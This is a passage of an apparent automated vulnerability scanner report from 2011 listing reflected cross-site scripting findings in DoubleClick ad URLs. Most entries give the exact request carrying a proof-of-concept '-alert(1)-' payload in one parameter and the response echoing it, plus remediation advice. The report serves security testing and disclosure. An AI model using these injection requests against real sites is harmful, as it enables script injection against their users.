Referer: http://bidnw.ru4.com/nf?_pnot=0&_tpc=&_wp=1.61&_nv=1&_CDbg=18121040&_eo=52787&_sm=268435456&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFCBFAEAAAAAdIsUAQAAAABZjBQBAAAAAN6XFAEAAAAA35cUAQAAAACbPexBAAAAAAAAFEAAAAAAAAAAADPOAAAAAAAAAAAAAAAAAAAzzgAAAAAAACQAAAAAAAAAN2FkYzRkMGUtOTlkMC00YTE2LWI2NjYtYzA4YmE2NWFjZDg2AAAAAAAAAAAUAAAAAAAAAEFHLTAwMDAwMDAxMzg5MzU4NTU0DwAAAAAAAAAxNzMuMTkzLjIxNC4yNDMGAAAAAAAAADcyOHg5MEIAAAAAAAAAaHR0cDovL3Nwb3J0ZGZ3LmNvbS8yMDExLzA2LzEzLzEwLW9ic2VydmF0aW9ucy1kYWxsYXMtbWF2cy1maW5hbHMvDgAAAAAAAAA0NDleMTk1XjIwOTk4NgAAAAAAAAAABgAAABwAAAAAAAYAAAAAAAAASUZSQU1FAAEADO71TQAAAAA=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4869
Date: Mon, 13 Jun 2011 11:02:46 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
p://s0.2mdn.net/1887566/dec10reach_728x90.jpg';
var dccreativewidth = '728';
var dcwmode = 'opaque';
var imgurl = 'http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787e42d1'-alert(1)-'93e759a580b&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=http%3a%2f%2fwww.fingerhut.com/user/start_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dreach%26CTMedia%3Dx1%26CTProgType%3Dmplus
...[SNIP]...

4.20. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_et parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/fingerhut/mass/rmkt

Issue detail

The value of the _et request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7df87'-alert(1)-'6dd69a55840 was submitted in the _et parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=13079628927df87'-alert(1)-'6dd69a55840&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=;u=18123865;ord=5047475? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidnw.ru4.com/nf?_pnot=0&_tpc=&_wp=1.61&_nv=1&_CDbg=18121040&_eo=52787&_sm=268435456&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFCBFAEAAAAAdIsUAQAAAABZjBQBAAAAAN6XFAEAAAAA35cUAQAAAACbPexBAAAAAAAAFEAAAAAAAAAAADPOAAAAAAAAAAAAAAAAAAAzzgAAAAAAACQAAAAAAAAAN2FkYzRkMGUtOTlkMC00YTE2LWI2NjYtYzA4YmE2NWFjZDg2AAAAAAAAAAAUAAAAAAAAAEFHLTAwMDAwMDAxMzg5MzU4NTU0DwAAAAAAAAAxNzMuMTkzLjIxNC4yNDMGAAAAAAAAADcyOHg5MEIAAAAAAAAAaHR0cDovL3Nwb3J0ZGZ3LmNvbS8yMDExLzA2LzEzLzEwLW9ic2VydmF0aW9ucy1kYWxsYXMtbWF2cy1maW5hbHMvDgAAAAAAAAA0NDleMTk1XjIwOTk4NgAAAAAAAAAABgAAABwAAAAAAAYAAAAAAAAASUZSQU1FAAEADO71TQAAAAA=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4896
Date: Mon, 13 Jun 2011 11:02:57 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
.net/1887566/frugal_728x90.jpg';
var dccreativewidth = '728';
var dcwmode = 'opaque';
var imgurl = 'http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=13079628927df87'-alert(1)-'6dd69a55840&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=http%3a%2f%2fwww.fingerhut.com/user/start_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dfrugalmonster%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTU
...[SNIP]...

4.21. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_o parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/fingerhut/mass/rmkt

Issue detail

The value of the _o request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dca70'-alert(1)-'050bea894a2 was submitted in the _o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607dca70'-alert(1)-'050bea894a2&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=;u=18123865;ord=5047475? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidnw.ru4.com/nf?_pnot=0&_tpc=&_wp=1.61&_nv=1&_CDbg=18121040&_eo=52787&_sm=268435456&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFCBFAEAAAAAdIsUAQAAAABZjBQBAAAAAN6XFAEAAAAA35cUAQAAAACbPexBAAAAAAAAFEAAAAAAAAAAADPOAAAAAAAAAAAAAAAAAAAzzgAAAAAAACQAAAAAAAAAN2FkYzRkMGUtOTlkMC00YTE2LWI2NjYtYzA4YmE2NWFjZDg2AAAAAAAAAAAUAAAAAAAAAEFHLTAwMDAwMDAxMzg5MzU4NTU0DwAAAAAAAAAxNzMuMTkzLjIxNC4yNDMGAAAAAAAAADcyOHg5MEIAAAAAAAAAaHR0cDovL3Nwb3J0ZGZ3LmNvbS8yMDExLzA2LzEzLzEwLW9ic2VydmF0aW9ucy1kYWxsYXMtbWF2cy1maW5hbHMvDgAAAAAAAAA0NDleMTk1XjIwOTk4NgAAAAAAAAAABgAAABwAAAAAAAYAAAAAAAAASUZSQU1FAAEADO71TQAAAAA=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4872
Date: Mon, 13 Jun 2011 11:02:36 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
gif = 'http://s0.2mdn.net/1887566/reva728x90_grillz.jpg';
var dccreativewidth = '728';
var dcwmode = 'opaque';
var imgurl = 'http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607dca70'-alert(1)-'050bea894a2&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=http%3a%2f%2fwww.fingerhut.com/user/start_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dgrillz%26CTMedia%3Dx1%26CTProgT
...[SNIP]...

4.22. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_pm parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/fingerhut/mass/rmkt

Issue detail

The value of the _pm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 872f3'-alert(1)-'247dc5ea998 was submitted in the _pm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787872f3'-alert(1)-'247dc5ea998&_pn=18123865&redirect=;u=18123865;ord=5047475? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidnw.ru4.com/nf?_pnot=0&_tpc=&_wp=1.61&_nv=1&_CDbg=18121040&_eo=52787&_sm=268435456&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFCBFAEAAAAAdIsUAQAAAABZjBQBAAAAAN6XFAEAAAAA35cUAQAAAACbPexBAAAAAAAAFEAAAAAAAAAAADPOAAAAAAAAAAAAAAAAAAAzzgAAAAAAACQAAAAAAAAAN2FkYzRkMGUtOTlkMC00YTE2LWI2NjYtYzA4YmE2NWFjZDg2AAAAAAAAAAAUAAAAAAAAAEFHLTAwMDAwMDAxMzg5MzU4NTU0DwAAAAAAAAAxNzMuMTkzLjIxNC4yNDMGAAAAAAAAADcyOHg5MEIAAAAAAAAAaHR0cDovL3Nwb3J0ZGZ3LmNvbS8yMDExLzA2LzEzLzEwLW9ic2VydmF0aW9ucy1kYWxsYXMtbWF2cy1maW5hbHMvDgAAAAAAAAA0NDleMTk1XjIwOTk4NgAAAAAAAAAABgAAABwAAAAAAAYAAAAAAAAASUZSQU1FAAEADO71TQAAAAA=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4847
Date: Mon, 13 Jun 2011 11:03:36 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
creativewidth = '728';
var dcwmode = 'opaque';
var imgurl = 'http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787872f3'-alert(1)-'247dc5ea998&_pn=18123865&redirect=http%3a%2f%2fwww.fingerhut.com/user/pre_screen_credit.jsp%3FCTid%3D471%26CTKey%3Ddefault%26CTMedia%3Dx1%26CTProgType%3Dmass%26CTUnitSize%3D728x90%26CTTestGrp%3Dflash%26cm_mmc%3Dx
...[SNIP]...

4.23. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_pn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/fingerhut/mass/rmkt

Issue detail

The value of the _pn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30b70'-alert(1)-'a0c0bb2c16a was submitted in the _pn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=1812386530b70'-alert(1)-'a0c0bb2c16a&redirect=;u=18123865;ord=5047475? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidnw.ru4.com/nf?_pnot=0&_tpc=&_wp=1.61&_nv=1&_CDbg=18121040&_eo=52787&_sm=268435456&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFCBFAEAAAAAdIsUAQAAAABZjBQBAAAAAN6XFAEAAAAA35cUAQAAAACbPexBAAAAAAAAFEAAAAAAAAAAADPOAAAAAAAAAAAAAAAAAAAzzgAAAAAAACQAAAAAAAAAN2FkYzRkMGUtOTlkMC00YTE2LWI2NjYtYzA4YmE2NWFjZDg2AAAAAAAAAAAUAAAAAAAAAEFHLTAwMDAwMDAxMzg5MzU4NTU0DwAAAAAAAAAxNzMuMTkzLjIxNC4yNDMGAAAAAAAAADcyOHg5MEIAAAAAAAAAaHR0cDovL3Nwb3J0ZGZ3LmNvbS8yMDExLzA2LzEzLzEwLW9ic2VydmF0aW9ucy1kYWxsYXMtbWF2cy1maW5hbHMvDgAAAAAAAAA0NDleMTk1XjIwOTk4NgAAAAAAAAAABgAAABwAAAAAAAYAAAAAAAAASUZSQU1FAAEADO71TQAAAAA=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4886
Date: Mon, 13 Jun 2011 11:03:45 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
= '728';
var dcwmode = 'opaque';
var imgurl = 'http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=1812386530b70'-alert(1)-'a0c0bb2c16a&redirect=http%3a%2f%2fwww.fingerhut.com/user/start_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dhairyguy%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dflash%26cm_mmc%3Dx1-_-mplu
...[SNIP]...

4.24. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_s parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/fingerhut/mass/rmkt

Issue detail

The value of the _s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a3c1'-alert(1)-'7bf6f774d59 was submitted in the _s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=06a3c1'-alert(1)-'7bf6f774d59&_d=18123636&_pm=52787&_pn=18123865&redirect=;u=18123865;ord=5047475? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidnw.ru4.com/nf?_pnot=0&_tpc=&_wp=1.61&_nv=1&_CDbg=18121040&_eo=52787&_sm=268435456&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFCBFAEAAAAAdIsUAQAAAABZjBQBAAAAAN6XFAEAAAAA35cUAQAAAACbPexBAAAAAAAAFEAAAAAAAAAAADPOAAAAAAAAAAAAAAAAAAAzzgAAAAAAACQAAAAAAAAAN2FkYzRkMGUtOTlkMC00YTE2LWI2NjYtYzA4YmE2NWFjZDg2AAAAAAAAAAAUAAAAAAAAAEFHLTAwMDAwMDAxMzg5MzU4NTU0DwAAAAAAAAAxNzMuMTkzLjIxNC4yNDMGAAAAAAAAADcyOHg5MEIAAAAAAAAAaHR0cDovL3Nwb3J0ZGZ3LmNvbS8yMDExLzA2LzEzLzEwLW9ic2VydmF0aW9ucy1kYWxsYXMtbWF2cy1maW5hbHMvDgAAAAAAAAA0NDleMTk1XjIwOTk4NgAAAAAAAAAABgAAABwAAAAAAAYAAAAAAAAASUZSQU1FAAEADO71TQAAAAA=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4896
Date: Mon, 13 Jun 2011 11:03:16 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
al_728x90.jpg';
var dccreativewidth = '728';
var dcwmode = 'opaque';
var imgurl = 'http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=06a3c1'-alert(1)-'7bf6f774d59&_d=18123636&_pm=52787&_pn=18123865&redirect=http%3a%2f%2fwww.fingerhut.com/user/start_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dfrugalmonster%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%
...[SNIP]...

4.25. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/fingerhut/mass/rmkt

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 141ca'-alert(1)-'5ead3770817 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=141ca'-alert(1)-'5ead3770817 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidnw.ru4.com/nf?_pnot=0&_tpc=&_wp=1.61&_nv=1&_CDbg=18121040&_eo=52787&_sm=268435456&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFCBFAEAAAAAdIsUAQAAAABZjBQBAAAAAN6XFAEAAAAA35cUAQAAAACbPexBAAAAAAAAFEAAAAAAAAAAADPOAAAAAAAAAAAAAAAAAAAzzgAAAAAAACQAAAAAAAAAN2FkYzRkMGUtOTlkMC00YTE2LWI2NjYtYzA4YmE2NWFjZDg2AAAAAAAAAAAUAAAAAAAAAEFHLTAwMDAwMDAxMzg5MzU4NTU0DwAAAAAAAAAxNzMuMTkzLjIxNC4yNDMGAAAAAAAAADcyOHg5MEIAAAAAAAAAaHR0cDovL3Nwb3J0ZGZ3LmNvbS8yMDExLzA2LzEzLzEwLW9ic2VydmF0aW9ucy1kYWxsYXMtbWF2cy1maW5hbHMvDgAAAAAAAAA0NDleMTk1XjIwOTk4NgAAAAAAAAAABgAAABwAAAAAAAYAAAAAAAAASUZSQU1FAAEADO71TQAAAAA=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4675
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:03:47 GMT
Expires: Mon, 13 Jun 2011 11:03:47 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
var dcwmode = 'opaque';
var imgurl = 'http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=141ca'-alert(1)-'5ead3770817http://www.fingerhut.com/user/pre_screen_credit.jsp?CTid=471&CTKey=default&CTMedia=x1&CTProgType=mass&CTUnitSize=728x90&CTTestGrp=flash&cm_mmc=x1-_-mass-_-728x90-_-flash';
var target = '_blank';
var dc
...[SNIP]...

4.26. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/fingerhut/mass/rmkt

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d082a'-alert(1)-'eead87a656a was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86d082a'-alert(1)-'eead87a656a&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=;u=18123865;ord=5047475? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidnw.ru4.com/nf?_pnot=0&_tpc=&_wp=1.61&_nv=1&_CDbg=18121040&_eo=52787&_sm=268435456&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFCBFAEAAAAAdIsUAQAAAABZjBQBAAAAAN6XFAEAAAAA35cUAQAAAACbPexBAAAAAAAAFEAAAAAAAAAAADPOAAAAAAAAAAAAAAAAAAAzzgAAAAAAACQAAAAAAAAAN2FkYzRkMGUtOTlkMC00YTE2LWI2NjYtYzA4YmE2NWFjZDg2AAAAAAAAAAAUAAAAAAAAAEFHLTAwMDAwMDAxMzg5MzU4NTU0DwAAAAAAAAAxNzMuMTkzLjIxNC4yNDMGAAAAAAAAADcyOHg5MEIAAAAAAAAAaHR0cDovL3Nwb3J0ZGZ3LmNvbS8yMDExLzA2LzEzLzEwLW9ic2VydmF0aW9ucy1kYWxsYXMtbWF2cy1maW5hbHMvDgAAAAAAAAA0NDleMTk1XjIwOTk4NgAAAAAAAAAABgAAABwAAAAAAAYAAAAAAAAASUZSQU1FAAEADO71TQAAAAA=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4847
Date: Mon, 13 Jun 2011 11:02:24 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
'';
var dcgif = 'http://s0.2mdn.net/1887566/728x90_aHairyGuy.jpg';
var dccreativewidth = '728';
var dcwmode = 'opaque';
var imgurl = 'http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86d082a'-alert(1)-'eead87a656a&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=http%3a%2f%2fwww.fingerhut.com/user/pre_screen_credit.jsp%3FCTid%3D471%26CTKey%3Ddefault%26CTMedia%3Dx1%2
...[SNIP]...

4.27. http://ad.doubleclick.net/adj/cm.mtv/ent_010111 [net parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://ad.doubleclick.net
Path:   /adj/cm.mtv/ent_010111

Issue detail

The value of the net request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e1c4'%3bfe92e006168 was submitted in the net parameter. This input was echoed as 8e1c4';fe92e006168 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.mtv/ent_010111;net=8e1c4'%3bfe92e006168 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
